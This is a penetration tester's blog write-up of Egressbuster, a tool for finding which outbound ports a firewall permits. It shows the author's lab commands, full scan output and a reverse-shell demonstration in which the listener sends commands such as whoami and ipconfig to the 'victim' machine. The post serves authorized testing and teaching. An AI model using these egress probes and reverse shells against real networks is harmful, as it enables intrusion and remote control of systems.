Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
While I’ve used it for a while now, I wanted to share a quick write-up about Egressbuster.
Egressbuster – Introduction
Egressbuster (GitHub repository) is a tool by TrustedSec that they designed to test outgoing ports during a penetration test.
Configuring the Firewall
First, I configured my firewall to block all outgoing ports except for 22, 80, 443, and 31337-31339. This would allow me to verify that the application was working.
Additionally, it mirrors a real environment that might only allow HTTP(s) traffic and then something obscure outbound.
Starting the Server
With my firewall rules in place, I started the server up on a DO droplet.
root@ubuntu-512mb-sfo2-01:~# ifconfig eth0 | grep Mask
inet addr:138.xx.xx.xx Bcast:138.xx.xx.255 Mask:255.255.xx.xx
root@ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
Running the Client
With the server running, it was time to test the rules.
While I used the egressbuster.py script, the results will be the same with the executable as well.
Also, based on my “very official” timing method, it takes about 12 minutes to test every port over my connection.
C:\Users\Ray\Documents>time The current time is: 15:57:43.78 Enter the new time: C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-65535 [i] Sending packets to egress listener (138.xx.xx.xx)... [i] Starting at: 1/tcp, ending at: 65535/tcp [*] Connection made to 138.xx.xx.xx on port: 22/tcp [*] Connection made to 138.xx.xx.xx on port: 80/tcp [*] Connection made to 138.xx.xx.xx on port: 443/tcp [v] Trying: TCP 1000 [v] Trying: TCP 2000 ... <snip> ... [v] Trying: TCP 31000 [*] Connection made to 138.xx.xx.xx on port: 31337/tcp [*] Connection made to 138.xx.xx.xx on port: 31338/tcp [*] Connection made to 138.xx.xx.xx on port: 31339/tcp [v] Trying: TCP 32000 [v] Trying: TCP 33000 ... <snip> ... [v] Trying: TCP 65000 [*] All packets have been sent [i] Remaining threads: 301 [i] Remaining threads: 102 [i] Remaining threads: 3 ... <snip> ... [i] Remaining threads: 3 Traceback (most recent call last): File "egressbuster.py", line 168, intime.sleep(2) KeyboardInterrupt C:\Users\Ray\Documents>time The current time is: 16:09:49.56 Enter the new time:
I’m not sure why three threads didn’t want to complete, but the results were still completely accurate.
Server Results
Going back to the server, I was able to see the successful connections as well.
root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx [*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp [*] Listening on all TCP ports now... Press control-c when finished. [*] Connected from 172.xx.xx.xx on port: 22/tcp [*] Connected from 172.xx.xx.xx on port: 80/tcp [*] Connected from 172.xx.xx.xx on port: 443/tcp [*] Connected from 172.xx.xx.xx on port: 31338/tcp [*] Connected from 172.xx.xx.xx on port: 31337/tcp [*] Connected from 172.xx.xx.xx on port: 31339/tcp ^C [*] Exiting and removing iptables redirect rule. [*] Done
Shell Parameter
Finally, I want to give a quick demonstration of the shell parameter. This parameter creates a reverse shell that allows you to send commands to the “target” system. Author’s note: This reverse shell goes from your listening server to the internal server, so you will need to either have an external IP address or NAT configured.
First, I setup NAT rules on my pfSense box so that I could receive the commands.
Next, I started the server back up with the shell parameter.
root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell [*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp [*] Listening on all TCP ports now... Press control-c when finished.
Finally, I ran the script to test outgoing connections again. Note that I only used ports 1-50 for this test since I already knew what would work.
C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-50 shell [i] Sending packets to egress listener (138.xx.xx.xx)... [i] Starting at: 1/tcp, ending at: 50/tcp [*] Connection made to 138.xx.xx.xx on port: 22/tcp [*] All packets have been sent [i] Remaining threads: 50 [i] Remaining threads: 50 [i] Remaining threads: 1 [i] Remaining threads: 1 [*] Done
On the listener side, I was able to send commands to the client. This was occasionally flaky, and would drop or send the wrong command. I would probably use this for short bursts/1 or 2 commands before migrating to something more stable.
root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
Enter the command to send to the victim:
Enter the command to send to the victim: whoami
megatron\ray
Enter the command to send to the victim: ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . : xxx
IPv4 Address. . . . . . . . . . . : 192.168.5.xx
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.5.1
Tunnel adapter isatap.
Enter the command to send to the victim: dir
----------------------------------------
Exception happened during processing of request from ('172.xx.xx.xx', 59070)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
self.handle()
File "egress_listener.py", line 63, in handle
self.request.sendall(request)
File "/usr/lib/python2.7/socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
error: [Errno 32] Broken pipe
----------------------------------------
dir
^C
[*] Exiting and removing iptables redirect rule.
[*] Done
Egressbuster – Conclusion
This is a great tool for testing outgoing ports on a network, and I find myself using it from time to time.
Additionally, having the executable makes life easier for Windows machines without Python.
Note that a few vendors that flag the executable, so be aware of that during your testing.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.
